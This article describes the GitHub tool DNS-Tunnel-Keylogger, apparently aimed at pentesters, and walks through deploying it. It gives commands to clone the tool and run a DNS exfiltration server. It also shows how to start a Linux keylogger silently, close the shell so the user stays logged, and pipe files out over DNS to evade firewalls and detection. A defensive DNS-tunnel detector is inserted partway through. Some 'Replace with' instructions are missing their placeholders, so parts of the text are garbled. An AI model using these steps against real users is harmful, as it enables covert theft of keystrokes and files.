A new keylogging server and client tool has been released on GitHub for pentesters. The tool uses DNS tunneling to transmit keystrokes through firewalls, potentially evading detection.
The tool, DNS-Tunnel-Keylogger, was designed for post-exploitation activities for pentesters and emphasizes lightweight exfiltration and persistence to minimize the chances of being discovered by security systems.
The server component of the tool is written in Python 3 and requires the installation of dependencies via pip.
It operates by default on UDP port 53, but users can specify a different port using the -p flag. The server’s IP address is used in SOA and NS records to enable other nameservers to locate the server.
Users are instructed to set their domain’s namespace to custom DNS and point it to the exfiltration server’s IP address, effectively setting glue records.
DNS tunneling is a technique for encoding the data of other programs or protocols in DNS queries and responses.
This can be particularly useful for post-exploitation data extraction while avoiding detection and firewall restrictions.
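Seen from the defender's side, data encoded in DNS queries shows up in resolver logs as many distinct, long, random-looking subdomains under a single domain. The sketch below is an added example, not code from the tool or from this article; the log format, the thresholds and the hex-style labels in the sample are constructed assumptions, since the article does not describe the tool's encoding.

```python
import math
from collections import Counter, defaultdict

def shannon_entropy(s):
    """Bits per character; encoded data scores higher than ordinary hostnames."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def base_domain(qname):
    """Assumption: the registered domain is the last two labels (no public-suffix list)."""
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])

def find_tunnel_candidates(queries, min_unique=5, min_len=20, min_entropy=3.0):
    """queries: iterable of (client_ip, qname). Thresholds are illustrative; tune per network."""
    subs = defaultdict(set)  # a set, so retransmitted duplicate queries count once
    for _client, qname in queries:
        name = qname.rstrip(".").lower()
        base = base_domain(name)
        sub = name[: -len(base)].rstrip(".")
        if sub:  # skip queries for the bare domain itself
            subs[base].add(sub)
    flagged = {}
    for base, names in subs.items():
        mean_len = sum(len(n) for n in names) / len(names)
        mean_ent = sum(shannon_entropy(n.replace(".", "")) for n in names) / len(names)
        # Require all three signals together to reduce false positives.
        if len(names) >= min_unique and mean_len >= min_len and mean_ent >= min_entropy:
            flagged[base] = {"unique": len(names), "mean_len": round(mean_len, 1),
                             "mean_entropy": round(mean_ent, 2)}
    return flagged

# Constructed sample log (not captured traffic): six encoded-looking queries to one
# domain, one duplicate, and a few ordinary lookups.
_HEX = "0123456789abcdef" * 2
SAMPLE = [("10.0.0.5", f"{_HEX[i:] + _HEX[:i]}.tunnel.example") for i in range(6)]
SAMPLE.append(SAMPLE[0])  # duplicate query, counted once
SAMPLE += [("10.0.0.7", n) for n in ("www.corp.example", "mail.corp.example",
                                      "intranet.corp.example", "api.cdn.example")]

if __name__ == "__main__":
    for domain, stats in find_tunnel_candidates(SAMPLE).items():
        print(domain, stats)
```

In practice the input would come from resolver or passive-DNS logs, and domains that legitimately use hashed hostnames need an allowlist.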
- Knowledge of DNS and networking concepts
- Familiarity with Python and Bash scripting
- A Linux environment for the keylogger client
- Python3 installed on the server
On the client side, the Linux keylogger consists of two bash scripts. The connection.sh script is responsible for sending the captured keystrokes to the server, while the logger.sh script is used to start the keylogging process.
The keylogger can be started silently, and the shell can be closed upon exit to avoid returning to a non-keylogger state.
The developers note that the keylogger will not run in non-interactive shells and that the Windows Dns_Query_A function tends to send duplicate requests, although the server is designed to handle this by discarding repeated packets.
DNS Tunnel Keylogger – Server Setup
Step 1: Clone the Repository
First, you need to clone the DNS-Tunnel-Keylogger repository from GitHub:
git clone https://github.com/Geeoon/DNS-Tunnel-Keylogger.git
Step 2: Install Dependencies
Navigate to the cloned directory and install the required Python dependencies:
cd DNS-Tunnel-Keylogger
python3 -m pip install -r requirements.txt
Step 3: Start the Server
To start the server, use the following command:
python3 main.py
Replace
with the IP address of the server and
with the domain that the server is authoritative for.
Server Options:
- -h, --help: Show the help message and exit.
- -p PORT, --port PORT: Specify a different port to listen on. By default, the server listens on UDP port 53.
Client Setup (Linux Keylogger)
Step 1: Prepare the Scripts
Ensure that logger.sh and connection.sh are in the same directory. These scripts will capture and send the keystrokes to the server.
Step 2: Start the Keylogger
To start the keylogger, execute the following command:
./logger.sh && exit
Replace
with the domain to send data to. The && exit will close the shell upon exit to prevent returning to a non-keylogged shell.
Keylogger Options:
- -p path: Specify the path to the log file to listen to. By default, this is /tmp/.
- -l: Run the logger with warnings and errors printed, which can be useful for debugging.
Additional Information
Manual Data Transmission
If you wish to send data, such as a file, manually, you can pipe the data to the connection.sh script, which will establish a connection and send the data.
Security Considerations
If used without proper authorization, a keylogger and DNS tunneling can be considered malicious and illegal in many jurisdictions. Ensure you can use these tools in your environment and comply with all relevant laws and ethical guidelines.
Troubleshooting
- If you encounter issues, remove the &> /dev/null from the keylogger command to display error messages.
- Check the server’s firewall settings to ensure the DNS port (default 53) is open for incoming and outgoing connections.
- Please verify that the domain used is correctly configured and that the server is set as authoritative for it.
This guide provides the steps to set up a DNS tunneling keylogger for covert keystroke exfiltration. Remember to use this tool responsibly and within the law.